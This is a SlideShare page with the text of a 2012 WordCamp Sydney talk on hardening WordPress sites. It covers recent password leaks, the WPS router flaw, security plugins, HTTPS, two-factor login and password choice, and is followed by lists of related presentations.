SlideShare una empresa de Scribd logo

Securing Your WordPress Website - WordCamp Sydney 2012

V
Vlad Lasky

Presentation slides from Vladimir Lasky's talk "Security for WordPress", presented on Sunday 22nd July at WordCamp Sydney 2012. This talk is the sequel to his WordCamp Gold Coast 2011 presentation “Securing Your WordPress Website” and covers: *Tackling the biggest Internet and WordPress security threats of 2012 *An updated list of essential plugins to harden your WordPress site *New WordPress management services that make it easier to back up and update your sites

SoftwareTecnologíaEmpresariales
1 de 25
Descargar para leer sin conexión
Securing Your WordPress Website Vladimir Lasky http://wpexpert.com.au/ WordCamp Sydney 2012 1
What’s New In Today’s Talk? 1. The biggest security threats of 2012 and how to deal with them 2. An updated list of essential WordPress hardening steps for EVERY site 3. New WordPress management services that make your life easier 2
Big Events in Internet Security This Year 1. Yahoo, LinkedIn, eHarmony all experienced security incidents that resulted in users’ passwords/hashes being published 2. Lots of exploits targeting code using vulnerable PHP libraries including TimThumb and Uploadify 3. Wi-Fi Protected Setup (WPS) vulnerability in Wireless Routers revealed in December 2011 3
4
5
Lessons From Password Disclosure Incidents 1. You cannot assume any website will properly secure their databases. 2. Plenty of computational power exists for brute-force password cracking of password hashes – spare no effort to prevent these from being leaked. 3. People who reuse the same password across different sites are asking to get “p0wned” and become targets for identity theft. 4. Having a unique, secure password for every Internet account is mandatory. 6
Wi-Fi Protected Setup Wi- 7
Lessons from WPS Vulnerability 1. The WPS exploit provides a backdoor to wireless routers secured with WPA2 2. Technologies that overcome security burdens often introduce security holes 3. Disable WPS in every Wi-Fi Router that you control. In some cases, this will require a firmware upgrade or possibly even replacing the router 8
Example PHP Exploit Attempt 9
Lessons from PHP Exploits 1. Many programmers are lazy or ignorant of proper data validation practices 2. Obtaining plugins and themes from official sources reduces risk, but does not guaratee security 3. Application firewalls are a NECESSITY 10
Essential Steps to Harden Your WP Installation 11
Install WP Firewall 2 This plugin analyses HTTP requests and checks for suspicious parameters that indicate PHP or SQL injection attempts It will protect you against the majority of zero- day exploits Set the configuration option ‘Suppress similar attack warning emails’ to ‘On’, to prevent being deluged with identical warnings. 12
Rename Your Admin Account 1. Use the plugin ‘Admin Renamer Extended’ to rename the ‘admin’ account to something unique. 2. From the WP Dashboard, go to Users->Your Profile. For the option set ‘Display Name Publicly as’, choose something that is not the same as your admin account name 13
Change the Default MySQL Table Prefix 1. The WordPress default MySQL table prefix is ‘wp_’. 2. By renaming this to something else, ie. ‘tb132_’ we can foil the majority of blind SQL injection attempts 3. For an existing site, use the plugin “WordPress Table Rename” to make this easier. 14
Prevent Plaintext Password Transmission – Best Option 1. Have your site hosted with a provider that supports HTTPS and provides either: – Their own Shared SSL Certificate – The ability to install your own – The ability to obtain one for you and install it (usually for a fee) 2. Install the plugin “WP HTTPS (SSL)” and enable the option “Force SSL Administration”. 3. This will prevent your password and session cookies from being sniffed (captured) over the Network 15
Prevent Plaintext Password Transmission – Next Best 1. If you can’t use HTTPS, then install the plugin “Semisecure Login Reimagined”. 2. This uses Javascript to encrypt your password before sending it to the server 3. Make sure you logout from WordPress to prevent network eavedroppers from sniffing (capturing) and re-using your session key. 16
Prevent Brute-Force Login Attempts Brute- Install one of the following plugins: 1. Login Security Solution – Slows down response time of your website after multiple failed attempts – Prevents users from choosing weak passwords and 2. Limit Login Attempts – Locks out accounts for a set time period after multiple failed attempts 17
Install WP File Monitor Plus This plugin monitors files under your WP installation for changes. When a change is detected, it displays a dashboard alert and can also send an email As an administrator, you can view the list of changes and spot anything unexpected or unusual 18
Essential Security Habits 19
Regularly Update Your Site, Plugins and Themes The last talk stressed the importance of performing regular updates to WordPress, themes and plugins and performing regular remotely-initiated backups Several WordPress management services now exist to simply and speed up these steps: – ManageWP (hosted) – InfiniteWP (self-hosted) – WP Remote (hosted) – Worpit (hosted) 20
Accessing Your Site From Untrusted PCs Two-Factor authentication is mandatory This is a combination of a password and a random number from a key fob, SMS message or a mobile phone app that you obtain each time you log in WordPress Two-Factor plugins include: 1. Second Factor 2. Google Authenticator 3. Duo Two-Factor Authentication 21
Accessing Your Site From Untrusted Networks 1. If you can, use your smart phone or laptop PC equipped with 3G, 4G or GPRS Mobile Internet 2. If you are forced to use a public WiFi access point or LAN, ensure that any sites requiring authentication are accessed via their HTTPS (secure) link. 22
Choosing a Password Twelve characters long as a minimum, but not a dictionary word Common number/letter substitutions provide little extra security – cracking tools almost always check for these 23
Password Memorisation Techniques 1. Come up with a memorable sentence, and use the first letters of each word to form the password e.g. – “Jack and Jill went up the hill to fetch a pale of water” could form a 13-character password “JaJwuthtfapow” 2. Three unrelated unconnected dictionary words one after the other, misspelt a certain way known to you On your own trusted PC, consider using an encrypted password manager like KeePass 24
Conclusion Slides from Previous Talk at Wordcamp GC 2011: – http://slidesha.re/tr2XA5 – Covers the “Three Pillars of Security”, the aims of attackers and other WordPress security plugins ManageWP - 30% discount on all plans for WordCamp Sydney Attendees: – http://managewp.com/wcsyd Questions and Comments: – http://wpexpert.com.au/contact-us/ 25

Recomendados

Make WordPress Fly With Virtual Server Hosting - WordCamp Sydney 2014
Make WordPress Fly With Virtual Server Hosting - WordCamp Sydney 2014Make WordPress Fly With Virtual Server Hosting - WordCamp Sydney 2014
Make WordPress Fly With Virtual Server Hosting - WordCamp Sydney 2014Vlad Lasky
 
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016Vlad Lasky
 
Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)WordCamp Cape Town
 
WordCamp Harare 2016 - Site Speed = Success
WordCamp Harare 2016 - Site Speed = SuccessWordCamp Harare 2016 - Site Speed = Success
WordCamp Harare 2016 - Site Speed = SuccessAnthony Somerset
 
Mastering VMware Datacenter Part-1
Mastering VMware Datacenter Part-1Mastering VMware Datacenter Part-1
Mastering VMware Datacenter Part-1M.M.Rahman Munna, Linux, VMware and Mail Server Expert
 
High Performance Sites with Drupal and Cache Control Module
High Performance Sites with Drupal and Cache Control ModuleHigh Performance Sites with Drupal and Cache Control Module
High Performance Sites with Drupal and Cache Control ModuleExove
 
Improving Website Performance with Memecached Webinar | Achieve Internet
Improving Website Performance with Memecached Webinar | Achieve InternetImproving Website Performance with Memecached Webinar | Achieve Internet
Improving Website Performance with Memecached Webinar | Achieve InternetAchieve Internet
 
Optimizing WordPress for Performance - WordCamp Houston
Optimizing WordPress for Performance - WordCamp HoustonOptimizing WordPress for Performance - WordCamp Houston
Optimizing WordPress for Performance - WordCamp HoustonChris Olbekson
 

Recomendados

Make WordPress Fly With Virtual Server Hosting - WordCamp Sydney 2014
Make WordPress Fly With Virtual Server Hosting - WordCamp Sydney 2014Make WordPress Fly With Virtual Server Hosting - WordCamp Sydney 2014
Make WordPress Fly With Virtual Server Hosting - WordCamp Sydney 2014Vlad Lasky
 
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016
Tips for Fixing a Hacked WordPress Site - WordCamp Sydney 2016Vlad Lasky
 
Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)WordCamp Cape Town
 
WordCamp Harare 2016 - Site Speed = Success
WordCamp Harare 2016 - Site Speed = SuccessWordCamp Harare 2016 - Site Speed = Success
WordCamp Harare 2016 - Site Speed = SuccessAnthony Somerset
 
Mastering VMware Datacenter Part-1
Mastering VMware Datacenter Part-1Mastering VMware Datacenter Part-1
Mastering VMware Datacenter Part-1M.M.Rahman Munna, Linux, VMware and Mail Server Expert
 
High Performance Sites with Drupal and Cache Control Module
High Performance Sites with Drupal and Cache Control ModuleHigh Performance Sites with Drupal and Cache Control Module
High Performance Sites with Drupal and Cache Control ModuleExove
 
Improving Website Performance with Memecached Webinar | Achieve Internet
Improving Website Performance with Memecached Webinar | Achieve InternetImproving Website Performance with Memecached Webinar | Achieve Internet
Improving Website Performance with Memecached Webinar | Achieve InternetAchieve Internet
 
Optimizing WordPress for Performance - WordCamp Houston
Optimizing WordPress for Performance - WordCamp HoustonOptimizing WordPress for Performance - WordCamp Houston
Optimizing WordPress for Performance - WordCamp HoustonChris Olbekson
 
Advanced Web Hosting
Advanced Web HostingAdvanced Web Hosting
Advanced Web HostingOVHcloud
 
Adobe AEM Maintenance - Customer Care Office Hours
Adobe AEM Maintenance - Customer Care Office HoursAdobe AEM Maintenance - Customer Care Office Hours
Adobe AEM Maintenance - Customer Care Office HoursAndrew Khoury
 
Lessons On Hyper V
Lessons On Hyper VLessons On Hyper V
Lessons On Hyper VAidan Finn
 
S903 palla
S903 pallaS903 palla
S903 pallaAndrew Khoury
 
WordPress MU 101
WordPress MU 101WordPress MU 101
WordPress MU 101Pete Mall
 
Speeding Up WordPress sites
Speeding Up WordPress sitesSpeeding Up WordPress sites
Speeding Up WordPress sitesJason Yingling
 
High performance WordPress
High performance WordPressHigh performance WordPress
High performance WordPressMikel King
 
Redundancy Rocks. Redundancy Rocks.
Redundancy Rocks. Redundancy Rocks.Redundancy Rocks. Redundancy Rocks.
Redundancy Rocks. Redundancy Rocks.AOE
 
Web agencies: An analysis of the OVH infrastructure to optimise your web proj...
Web agencies: An analysis of the OVH infrastructure to optimise your web proj...Web agencies: An analysis of the OVH infrastructure to optimise your web proj...
Web agencies: An analysis of the OVH infrastructure to optimise your web proj...OVHcloud
 
Word Press Security
Word Press SecurityWord Press Security
Word Press SecurityRandall Rode
 
Accelerate your ColdFusion Applications using Caching
Accelerate your ColdFusion Applications using CachingAccelerate your ColdFusion Applications using Caching
Accelerate your ColdFusion Applications using CachingColdFusionConference
 
Advancedtroubleshooting 101208145718-phpapp01
Advancedtroubleshooting 101208145718-phpapp01Advancedtroubleshooting 101208145718-phpapp01
Advancedtroubleshooting 101208145718-phpapp01Suresh Kumar
 
Mastering VMware Datacenter - 15 Modules
Mastering VMware Datacenter - 15 ModulesMastering VMware Datacenter - 15 Modules
Mastering VMware Datacenter - 15 ModulesM.M.Rahman Munna, Linux, VMware and Mail Server Expert
 
Linux system administration - part-2
Linux system administration - part-2Linux system administration - part-2
Linux system administration - part-2M.M.Rahman Munna, Linux, VMware and Mail Server Expert
 
Web Speed And Scalability
Web Speed And ScalabilityWeb Speed And Scalability
Web Speed And ScalabilityJason Ragsdale
 
Advantages of cPanel-based LiteSpeed Hosting
Advantages of cPanel-based LiteSpeed HostingAdvantages of cPanel-based LiteSpeed Hosting
Advantages of cPanel-based LiteSpeed HostingLisa Clarke
 
Vsphere esxi-vcenter-server-55-troubleshooting-guide
Vsphere esxi-vcenter-server-55-troubleshooting-guideVsphere esxi-vcenter-server-55-troubleshooting-guide
Vsphere esxi-vcenter-server-55-troubleshooting-guideSree Harsha Boyapati
 
Protect Your WordPress Website - Setting Up IThemes Security
Protect Your WordPress Website - Setting Up IThemes SecurityProtect Your WordPress Website - Setting Up IThemes Security
Protect Your WordPress Website - Setting Up IThemes SecurityRed8 Interactive
 
Caching
CachingCaching
CachingNascenia IT
 
20140521 DO-1 Baseline Report_FINAL
20140521 DO-1 Baseline Report_FINAL20140521 DO-1 Baseline Report_FINAL
20140521 DO-1 Baseline Report_FINALsbasgall
 
Social Networking
Social NetworkingSocial Networking
Social NetworkingSatapon Yosakonkun
 
Kesaksian astronaut tentang ufo
Kesaksian astronaut tentang ufoKesaksian astronaut tentang ufo
Kesaksian astronaut tentang ufoNur Agustinus
 

Más contenido relacionado

La actualidad más candente

Advanced Web Hosting
Advanced Web HostingAdvanced Web Hosting
Advanced Web HostingOVHcloud
 
Adobe AEM Maintenance - Customer Care Office Hours
Adobe AEM Maintenance - Customer Care Office HoursAdobe AEM Maintenance - Customer Care Office Hours
Adobe AEM Maintenance - Customer Care Office HoursAndrew Khoury
 
Lessons On Hyper V
Lessons On Hyper VLessons On Hyper V
Lessons On Hyper VAidan Finn
 
WordPress MU 101
WordPress MU 101WordPress MU 101
WordPress MU 101Pete Mall
 
Speeding Up WordPress sites
Speeding Up WordPress sitesSpeeding Up WordPress sites
Speeding Up WordPress sitesJason Yingling
 
High performance WordPress
High performance WordPressHigh performance WordPress
High performance WordPressMikel King
 
Redundancy Rocks. Redundancy Rocks.
Redundancy Rocks. Redundancy Rocks.Redundancy Rocks. Redundancy Rocks.
Redundancy Rocks. Redundancy Rocks.AOE
 
Web agencies: An analysis of the OVH infrastructure to optimise your web proj...
Web agencies: An analysis of the OVH infrastructure to optimise your web proj...Web agencies: An analysis of the OVH infrastructure to optimise your web proj...
Web agencies: An analysis of the OVH infrastructure to optimise your web proj...OVHcloud
 
Word Press Security
Word Press SecurityWord Press Security
Word Press SecurityRandall Rode
 
Accelerate your ColdFusion Applications using Caching
Accelerate your ColdFusion Applications using CachingAccelerate your ColdFusion Applications using Caching
Accelerate your ColdFusion Applications using CachingColdFusionConference
 
Advancedtroubleshooting 101208145718-phpapp01
Advancedtroubleshooting 101208145718-phpapp01Advancedtroubleshooting 101208145718-phpapp01
Advancedtroubleshooting 101208145718-phpapp01Suresh Kumar
 
Web Speed And Scalability
Web Speed And ScalabilityWeb Speed And Scalability
Web Speed And ScalabilityJason Ragsdale
 
Advantages of cPanel-based LiteSpeed Hosting
Advantages of cPanel-based LiteSpeed HostingAdvantages of cPanel-based LiteSpeed Hosting
Advantages of cPanel-based LiteSpeed HostingLisa Clarke
 
Vsphere esxi-vcenter-server-55-troubleshooting-guide
Vsphere esxi-vcenter-server-55-troubleshooting-guideVsphere esxi-vcenter-server-55-troubleshooting-guide
Vsphere esxi-vcenter-server-55-troubleshooting-guideSree Harsha Boyapati
 
Protect Your WordPress Website - Setting Up IThemes Security
Protect Your WordPress Website - Setting Up IThemes SecurityProtect Your WordPress Website - Setting Up IThemes Security
Protect Your WordPress Website - Setting Up IThemes SecurityRed8 Interactive
 

La actualidad más candente (19)

Advanced Web Hosting
Advanced Web HostingAdvanced Web Hosting
Advanced Web Hosting
 
Adobe AEM Maintenance - Customer Care Office Hours
Adobe AEM Maintenance - Customer Care Office HoursAdobe AEM Maintenance - Customer Care Office Hours
Adobe AEM Maintenance - Customer Care Office Hours
 
Lessons On Hyper V
Lessons On Hyper VLessons On Hyper V
Lessons On Hyper V
 
S903 palla
S903 pallaS903 palla
S903 palla
 
WordPress MU 101
WordPress MU 101WordPress MU 101
WordPress MU 101
 
Speeding Up WordPress sites
Speeding Up WordPress sitesSpeeding Up WordPress sites
Speeding Up WordPress sites
 
High performance WordPress
High performance WordPressHigh performance WordPress
High performance WordPress
 
Redundancy Rocks. Redundancy Rocks.
Redundancy Rocks. Redundancy Rocks.Redundancy Rocks. Redundancy Rocks.
Redundancy Rocks. Redundancy Rocks.
 
Web agencies: An analysis of the OVH infrastructure to optimise your web proj...
Web agencies: An analysis of the OVH infrastructure to optimise your web proj...Web agencies: An analysis of the OVH infrastructure to optimise your web proj...
Web agencies: An analysis of the OVH infrastructure to optimise your web proj...
 
Word Press Security
Word Press SecurityWord Press Security
Word Press Security
 
Accelerate your ColdFusion Applications using Caching
Accelerate your ColdFusion Applications using CachingAccelerate your ColdFusion Applications using Caching
Accelerate your ColdFusion Applications using Caching
 
Advancedtroubleshooting 101208145718-phpapp01
Advancedtroubleshooting 101208145718-phpapp01Advancedtroubleshooting 101208145718-phpapp01
Advancedtroubleshooting 101208145718-phpapp01
 
Mastering VMware Datacenter - 15 Modules
Mastering VMware Datacenter - 15 ModulesMastering VMware Datacenter - 15 Modules
Mastering VMware Datacenter - 15 Modules
 
Linux system administration - part-2
Linux system administration - part-2Linux system administration - part-2
Linux system administration - part-2
 
Web Speed And Scalability
Web Speed And ScalabilityWeb Speed And Scalability
Web Speed And Scalability
 
Advantages of cPanel-based LiteSpeed Hosting
Advantages of cPanel-based LiteSpeed HostingAdvantages of cPanel-based LiteSpeed Hosting
Advantages of cPanel-based LiteSpeed Hosting
 
Vsphere esxi-vcenter-server-55-troubleshooting-guide
Vsphere esxi-vcenter-server-55-troubleshooting-guideVsphere esxi-vcenter-server-55-troubleshooting-guide
Vsphere esxi-vcenter-server-55-troubleshooting-guide
 
Protect Your WordPress Website - Setting Up IThemes Security
Protect Your WordPress Website - Setting Up IThemes SecurityProtect Your WordPress Website - Setting Up IThemes Security
Protect Your WordPress Website - Setting Up IThemes Security
 
Caching
CachingCaching
Caching
 

Destacado

20140521 DO-1 Baseline Report_FINAL
20140521 DO-1 Baseline Report_FINAL20140521 DO-1 Baseline Report_FINAL
20140521 DO-1 Baseline Report_FINALsbasgall
 
Kesaksian astronaut tentang ufo
Kesaksian astronaut tentang ufoKesaksian astronaut tentang ufo
Kesaksian astronaut tentang ufoNur Agustinus
 
Atividade de inglês festa junina
Atividade de inglês festa juninaAtividade de inglês festa junina
Atividade de inglês festa juninaDaniela Azevedo
 
Attraction Social Media Intro
Attraction Social Media IntroAttraction Social Media Intro
Attraction Social Media IntroLars Toftefors
 
Upcoming Unity Schedule
Upcoming Unity ScheduleUpcoming Unity Schedule
Upcoming Unity ScheduleGary Gangnes
 
การจัดการรายการบรรณานุกรมด้วย Zeteroการจัดการรายการบรรณานุกรมด้วย Zetero Zetero
การจัดการรายการบรรณานุกรมด้วย Zeteroการจัดการรายการบรรณานุกรมด้วย Zetero Zetero การจัดการรายการบรรณานุกรมด้วย Zeteroการจัดการรายการบรรณานุกรมด้วย Zetero Zetero
การจัดการรายการบรรณานุกรมด้วย Zeteroการจัดการรายการบรรณานุกรมด้วย Zetero Zetero Satapon Yosakonkun
 
OSS Application on Linux เพื่อการจัดการห้องสมุดและทรัพยากรสารสนเทศ
OSS Application on Linux เพื่อการจัดการห้องสมุดและทรัพยากรสารสนเทศOSS Application on Linux เพื่อการจัดการห้องสมุดและทรัพยากรสารสนเทศ
OSS Application on Linux เพื่อการจัดการห้องสมุดและทรัพยากรสารสนเทศSatapon Yosakonkun
 
การทำรายการอ้างอิงด้วย Open Source Reference Manager : Zotero
การทำรายการอ้างอิงด้วย Open Source Reference Manager : Zoteroการทำรายการอ้างอิงด้วย Open Source Reference Manager : Zotero
การทำรายการอ้างอิงด้วย Open Source Reference Manager : ZoteroSatapon Yosakonkun
 
ฝ่ายบริการความรู้ทางวิทยาศาสตร์และเทคโนโลยี
ฝ่ายบริการความรู้ทางวิทยาศาสตร์และเทคโนโลยีฝ่ายบริการความรู้ทางวิทยาศาสตร์และเทคโนโลยี
ฝ่ายบริการความรู้ทางวิทยาศาสตร์และเทคโนโลยีSatapon Yosakonkun
 
Introduction to Agile and SCRUm
Introduction to Agile and SCRUmIntroduction to Agile and SCRUm
Introduction to Agile and SCRUmSumeet Moghe
 
Swa 23 edisi Social Entrepreneurship
Swa 23 edisi Social EntrepreneurshipSwa 23 edisi Social Entrepreneurship
Swa 23 edisi Social EntrepreneurshipNur Agustinus
 
โครงการถ่ายสำเนาอิเล็กทรอนิกส์หนังสือหายากจากประเทศสาธารณรัฐแห่งสหภาพพม่าตามพ...
โครงการถ่ายสำเนาอิเล็กทรอนิกส์หนังสือหายากจากประเทศสาธารณรัฐแห่งสหภาพพม่าตามพ...โครงการถ่ายสำเนาอิเล็กทรอนิกส์หนังสือหายากจากประเทศสาธารณรัฐแห่งสหภาพพม่าตามพ...
โครงการถ่ายสำเนาอิเล็กทรอนิกส์หนังสือหายากจากประเทศสาธารณรัฐแห่งสหภาพพม่าตามพ...Satapon Yosakonkun
 
สร้างสังคมดีด้วยเทคโนโลยีสารสนเทศ
สร้างสังคมดีด้วยเทคโนโลยีสารสนเทศสร้างสังคมดีด้วยเทคโนโลยีสารสนเทศ
สร้างสังคมดีด้วยเทคโนโลยีสารสนเทศSatapon Yosakonkun
 
เทคโนโลยี2.0{Web 2.0, Library 2.0, Enterprise 2.0}
เทคโนโลยี2.0{Web 2.0, Library 2.0, Enterprise 2.0}เทคโนโลยี2.0{Web 2.0, Library 2.0, Enterprise 2.0}
เทคโนโลยี2.0{Web 2.0, Library 2.0, Enterprise 2.0}Satapon Yosakonkun
 
OpenSource Software for Thesaurus & Reference tools
OpenSource Software for Thesaurus & Reference toolsOpenSource Software for Thesaurus & Reference tools
OpenSource Software for Thesaurus & Reference toolsSatapon Yosakonkun
 
Kiat bekerja di tempat baru
Kiat bekerja di tempat baruKiat bekerja di tempat baru
Kiat bekerja di tempat baruNur Agustinus
 

Destacado (20)

20140521 DO-1 Baseline Report_FINAL
20140521 DO-1 Baseline Report_FINAL20140521 DO-1 Baseline Report_FINAL
20140521 DO-1 Baseline Report_FINAL
 
Social Networking
Social NetworkingSocial Networking
Social Networking
 
Kesaksian astronaut tentang ufo
Kesaksian astronaut tentang ufoKesaksian astronaut tentang ufo
Kesaksian astronaut tentang ufo
 
Atividade de inglês festa junina
Atividade de inglês festa juninaAtividade de inglês festa junina
Atividade de inglês festa junina
 
Attraction Social Media Intro
Attraction Social Media IntroAttraction Social Media Intro
Attraction Social Media Intro
 
Upcoming Unity Schedule
Upcoming Unity ScheduleUpcoming Unity Schedule
Upcoming Unity Schedule
 
การจัดการรายการบรรณานุกรมด้วย Zeteroการจัดการรายการบรรณานุกรมด้วย Zetero Zetero
การจัดการรายการบรรณานุกรมด้วย Zeteroการจัดการรายการบรรณานุกรมด้วย Zetero Zetero การจัดการรายการบรรณานุกรมด้วย Zeteroการจัดการรายการบรรณานุกรมด้วย Zetero Zetero
การจัดการรายการบรรณานุกรมด้วย Zeteroการจัดการรายการบรรณานุกรมด้วย Zetero Zetero
 
OSS Application on Linux เพื่อการจัดการห้องสมุดและทรัพยากรสารสนเทศ
OSS Application on Linux เพื่อการจัดการห้องสมุดและทรัพยากรสารสนเทศOSS Application on Linux เพื่อการจัดการห้องสมุดและทรัพยากรสารสนเทศ
OSS Application on Linux เพื่อการจัดการห้องสมุดและทรัพยากรสารสนเทศ
 
การทำรายการอ้างอิงด้วย Open Source Reference Manager : Zotero
การทำรายการอ้างอิงด้วย Open Source Reference Manager : Zoteroการทำรายการอ้างอิงด้วย Open Source Reference Manager : Zotero
การทำรายการอ้างอิงด้วย Open Source Reference Manager : Zotero
 
CIC 2007 Report
CIC 2007 ReportCIC 2007 Report
CIC 2007 Report
 
Como preguntarnos
Como preguntarnosComo preguntarnos
Como preguntarnos
 
Gtd
GtdGtd
Gtd
 
ฝ่ายบริการความรู้ทางวิทยาศาสตร์และเทคโนโลยี
ฝ่ายบริการความรู้ทางวิทยาศาสตร์และเทคโนโลยีฝ่ายบริการความรู้ทางวิทยาศาสตร์และเทคโนโลยี
ฝ่ายบริการความรู้ทางวิทยาศาสตร์และเทคโนโลยี
 
Introduction to Agile and SCRUm
Introduction to Agile and SCRUmIntroduction to Agile and SCRUm
Introduction to Agile and SCRUm
 
Swa 23 edisi Social Entrepreneurship
Swa 23 edisi Social EntrepreneurshipSwa 23 edisi Social Entrepreneurship
Swa 23 edisi Social Entrepreneurship
 
โครงการถ่ายสำเนาอิเล็กทรอนิกส์หนังสือหายากจากประเทศสาธารณรัฐแห่งสหภาพพม่าตามพ...
โครงการถ่ายสำเนาอิเล็กทรอนิกส์หนังสือหายากจากประเทศสาธารณรัฐแห่งสหภาพพม่าตามพ...โครงการถ่ายสำเนาอิเล็กทรอนิกส์หนังสือหายากจากประเทศสาธารณรัฐแห่งสหภาพพม่าตามพ...
โครงการถ่ายสำเนาอิเล็กทรอนิกส์หนังสือหายากจากประเทศสาธารณรัฐแห่งสหภาพพม่าตามพ...
 
สร้างสังคมดีด้วยเทคโนโลยีสารสนเทศ
สร้างสังคมดีด้วยเทคโนโลยีสารสนเทศสร้างสังคมดีด้วยเทคโนโลยีสารสนเทศ
สร้างสังคมดีด้วยเทคโนโลยีสารสนเทศ
 
เทคโนโลยี2.0{Web 2.0, Library 2.0, Enterprise 2.0}
เทคโนโลยี2.0{Web 2.0, Library 2.0, Enterprise 2.0}เทคโนโลยี2.0{Web 2.0, Library 2.0, Enterprise 2.0}
เทคโนโลยี2.0{Web 2.0, Library 2.0, Enterprise 2.0}
 
OpenSource Software for Thesaurus & Reference tools
OpenSource Software for Thesaurus & Reference toolsOpenSource Software for Thesaurus & Reference tools
OpenSource Software for Thesaurus & Reference tools
 
Kiat bekerja di tempat baru
Kiat bekerja di tempat baruKiat bekerja di tempat baru
Kiat bekerja di tempat baru
 

Similar a Securing Your WordPress Website - WordCamp Sydney 2012

The Safest Way To Interact Online
The Safest Way To Interact OnlineThe Safest Way To Interact Online
The Safest Way To Interact Onlinepcsafe
 
Security Function
Security FunctionSecurity Function
Security FunctionSamuel Soon
 
Nsa best practices for keeping your home network secure
Nsa best practices for keeping your home network secureNsa best practices for keeping your home network secure
Nsa best practices for keeping your home network secureFort Rucker FRSA
 
201104 Best Practices For Keeping Your Home Network Secure
201104 Best Practices For Keeping Your Home Network Secure201104 Best Practices For Keeping Your Home Network Secure
201104 Best Practices For Keeping Your Home Network Securermpall
 
NSA Best Practices Datasheets
NSA Best Practices DatasheetsNSA Best Practices Datasheets
NSA Best Practices DatasheetsScientia Groups
 
Best practices datasheets
Best practices datasheetsBest practices datasheets
Best practices datasheetsfrankold
 
WordPress Security Presentation
WordPress Security PresentationWordPress Security Presentation
WordPress Security PresentationAndrew Paton
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Vlad Lasky
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Laskywordcampgc
 
10 server security hacks to secure your web servers
10 server security hacks to secure your web servers10 server security hacks to secure your web servers
10 server security hacks to secure your web serversTemok IT Services
 
WORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKEDWORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKEDStuartJDavidson.com
 
WordPress Security Essentials WordCamp Denver 2012
WordPress Security Essentials WordCamp Denver 2012WordPress Security Essentials WordCamp Denver 2012
WordPress Security Essentials WordCamp Denver 2012Angela Bowman
 
Tips to improve word press security ppt
Tips to improve word press security pptTips to improve word press security ppt
Tips to improve word press security pptCheap SSL Coupon Code
 
6 - Web Application Security.pptx
6 - Web Application Security.pptx6 - Web Application Security.pptx
6 - Web Application Security.pptxAlmaOraevi
 
IT Essentials (Version 7.0) - ITE Chapter 13 Exam Answers
IT Essentials (Version 7.0) - ITE Chapter 13 Exam AnswersIT Essentials (Version 7.0) - ITE Chapter 13 Exam Answers
IT Essentials (Version 7.0) - ITE Chapter 13 Exam AnswersITExamAnswers.net
 
How To Improve WooCommerce Security? Complete Security Checklist for 2023
How To Improve WooCommerce Security? Complete Security Checklist for 2023How To Improve WooCommerce Security? Complete Security Checklist for 2023
How To Improve WooCommerce Security? Complete Security Checklist for 2023BeePlugin
 
Security, more important than ever!
Security, more important than ever!Security, more important than ever!
Security, more important than ever!Marko Heijnen
 

Similar a Securing Your WordPress Website - WordCamp Sydney 2012 (20)

Locking down word press
Locking down word pressLocking down word press
Locking down word press
 
The Safest Way To Interact Online
The Safest Way To Interact OnlineThe Safest Way To Interact Online
The Safest Way To Interact Online
 
Security Function
Security FunctionSecurity Function
Security Function
 
Nsa best practices for keeping your home network secure
Nsa best practices for keeping your home network secureNsa best practices for keeping your home network secure
Nsa best practices for keeping your home network secure
 
201104 Best Practices For Keeping Your Home Network Secure
201104 Best Practices For Keeping Your Home Network Secure201104 Best Practices For Keeping Your Home Network Secure
201104 Best Practices For Keeping Your Home Network Secure
 
NSA Best Practices Datasheets
NSA Best Practices DatasheetsNSA Best Practices Datasheets
NSA Best Practices Datasheets
 
Best practices datasheets
Best practices datasheetsBest practices datasheets
Best practices datasheets
 
WordPress Security Best Practices
WordPress Security Best PracticesWordPress Security Best Practices
WordPress Security Best Practices
 
WordPress Security Presentation
WordPress Security PresentationWordPress Security Presentation
WordPress Security Presentation
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Lasky
 
10 server security hacks to secure your web servers
10 server security hacks to secure your web servers10 server security hacks to secure your web servers
10 server security hacks to secure your web servers
 
WORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKEDWORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKED
 
WordPress Security Essentials WordCamp Denver 2012
WordPress Security Essentials WordCamp Denver 2012WordPress Security Essentials WordCamp Denver 2012
WordPress Security Essentials WordCamp Denver 2012
 
Tips to improve word press security ppt
Tips to improve word press security pptTips to improve word press security ppt
Tips to improve word press security ppt
 
WordPress Security
WordPress Security WordPress Security
WordPress Security
 
6 - Web Application Security.pptx
6 - Web Application Security.pptx6 - Web Application Security.pptx
6 - Web Application Security.pptx
 
IT Essentials (Version 7.0) - ITE Chapter 13 Exam Answers
IT Essentials (Version 7.0) - ITE Chapter 13 Exam AnswersIT Essentials (Version 7.0) - ITE Chapter 13 Exam Answers
IT Essentials (Version 7.0) - ITE Chapter 13 Exam Answers
 
